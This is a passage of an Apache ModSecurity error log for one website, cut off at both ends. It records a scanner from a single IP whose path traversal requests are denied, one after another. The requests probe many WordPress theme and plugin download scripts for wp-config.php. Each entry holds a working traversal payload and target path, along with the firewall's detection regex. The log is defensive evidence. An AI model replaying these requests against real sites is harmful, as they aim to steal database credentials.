"7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/todays/download.php"] [unique_id "YtsccSpbG8_UBGXeM63w3QAAAIc"] [Fri Jul 22 16:53:53.879907 2022] [:error] [pid 22470:tid 140017049487104] [client 72.11.157.116:51682] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/banftheme/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/banftheme/download.php"] [unique_id "YtsccXxqqtgWgIAXsGFhiwAAAAs"] [Fri Jul 22 16:53:53.969995 2022] [:error] [pid 23081:tid 140016973952768] [client 72.11.157.116:51684] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/placid/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/placid/download.php"] [unique_id "YtsccXhurfgLch3PImzIHwAAANQ"] [Fri Jul 22 16:53:54.090772 2022] [:error] [pid 22472:tid 140017066272512] [client 72.11.157.116:51686] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/metz/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/metz/download.php"] [unique_id "YtsccipbG8_UBGXeM63w3gAAAIk"] [Fri Jul 22 16:53:54.197410 2022] [:error] [pid 22471:tid 140016990738176] [client 72.11.157.116:51688] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/caledobio/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/caledobio/framework/utilities/download/getfile.php"] [unique_id "YtsccuCtYZwatdwcM8Wq3QAAAFI"] [Fri Jul 22 16:53:54.296054 2022] [:error] [pid 22470:tid 140017041094400] [client 72.11.157.116:51690] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mingle/framework/utilities/download/getfile.php"] [unique_id "YtsccnxqqtgWgIAXsGFhjAAAAAw"] [Fri Jul 22 16:53:54.385986 2022] [:error] [pid 23081:tid 140016957167360] [client 72.11.157.116:51692] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/accesspress-store/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/accesspress-store/download.php"] [unique_id "YtsccnhurfgLch3PImzIIAAAANY"] [Fri Jul 22 16:53:54.476106 2022] [:error] [pid 22472:tid 140017032701696] [client 72.11.157.116:51694] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/PlixPro/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/PlixPro/download.php"] [unique_id "YtsccipbG8_UBGXeM63w3wAAAI0"] [Fri Jul 22 16:53:54.616479 2022] [:error] [pid 22472:tid 140017057879808] [client 72.11.157.116:51696] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/haarperfect/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/haarperfect/framework/utilities/download/getfile.php"] [unique_id "YtsccipbG8_UBGXeM63w4AAAAIo"] [Fri Jul 22 16:53:54.708578 2022] [:error] [pid 22472:tid 140016973952768] [client 72.11.157.116:51698] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/tools.php"] [unique_id "YtsccipbG8_UBGXeM63w4QAAAJQ"] [Fri Jul 22 16:53:55.967200 2022] [:error] [pid 23081:tid 140017099843328] [client 72.11.157.116:51706] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Ytscc3hurfgLch3PImzIIQAAAMU"] [Fri Jul 22 16:53:56.067515 2022] [:error] [pid 22471:tid 140017116628736] [client 72.11.157.116:51708] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-zip-attachments/download.php?File=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-zip-attachments/download.php"] [unique_id "YtscdOCtYZwatdwcM8Wq3gAAAEM"] [Fri Jul 22 16:53:57.416152 2022] [:error] [pid 22471:tid 140016940381952] [client 72.11.157.116:51716] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/3d-twitter-wall/proxy.php?url=file..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/3d-twitter-wall/proxy.php"] [unique_id "YtscdeCtYZwatdwcM8Wq3wAAAFg"] [Fri Jul 22 16:53:57.505922 2022] [:error] [pid 22471:tid 140017133414144] [client 72.11.157.116:51718] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php"] [unique_id "YtscdeCtYZwatdwcM8Wq4AAAAEE"] [Fri Jul 22 16:53:57.597348 2022] [:error] [pid 22471:tid 140017099843328] [client 72.11.157.116:51720] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ungallery/source.php?pic=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source.php"] [unique_id "YtscdeCtYZwatdwcM8Wq4QAAAEU"] [Fri Jul 22 16:53:57.687518 2022] [:error] [pid 22471:tid 140017066272512] [client 72.11.157.116:51722] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/flash-album-gallery/facebook.php?i=1&f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "YtscdeCtYZwatdwcM8Wq4gAAAEk"] [Fri Jul 22 16:53:57.777903 2022] [:error] [pid 22471:tid 140017057879808] [client 72.11.157.116:51724] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/section-widget/themes/theme-loader.php?theme=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/section-widget/themes/theme-loader.php"] [unique_id "YtscdeCtYZwatdwcM8Wq4wAAAEo"] [Fri Jul 22 16:53:57.868568 2022] [:error] [pid 22471:tid 140017024308992] [client 72.11.157.116:51726] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/yourls-widget/yourls-widget-hook.php?api_url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/yourls-widget/yourls-widget-hook.php"] [unique_id "YtscdeCtYZwatdwcM8Wq5AAAAE4"] [Fri Jul 22 16:53:57.958546 2022] [:error] [pid 23081:tid 140016990738176] [client 72.11.157.116:51728] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/3d-twitter-wall/proxy.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/3d-twitter-wall/proxy.php"] [unique_id "YtscdXhurfgLch3PImzIIgAAANI"] [Fri Jul 22 16:53:58.048851 2022] [:error] [pid 22470:tid 140017091450624] [client 72.11.157.116:51730] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/w3-total-cache/pub/files.php?file=..%2F..%2F..%2F..%2Fwp-config.php&nonce=0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/w3-total-cache/pub/files.php"] [unique_id "YtscdnxqqtgWgIAXsGFhkAAAAAY"] [Fri Jul 22 16:53:59.765338 2022] [:error] [pid 22470:tid 140017057879808] [client 72.11.157.116:51738] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/count-per-day/download.php?n=1&f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/count-per-day/download.php"] [unique_id "Ytscd3xqqtgWgIAXsGFhkwAAAAo"] [Fri Jul 22 16:53:59.873417 2022] [:error] [pid 22471:tid 140016982345472] [client 72.11.157.116:51740] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Rivercitychiro/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Rivercitychiro/framework/utilities/download/getfile.php"] [unique_id "Ytscd-CtYZwatdwcM8Wq5QAAAFM"] [Fri Jul 22 16:53:59.963732 2022] [:error] [pid 22472:tid 140016965560064] [client 72.11.157.116:51742] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/backbone/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/backbone/download.php"] [unique_id "YtscdypbG8_UBGXeM63w5AAAAJU"] [Fri Jul 22 16:54:00.064100 2022] [:error] [pid 23081:tid 140017091450624] [client 72.11.157.116:51744] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match 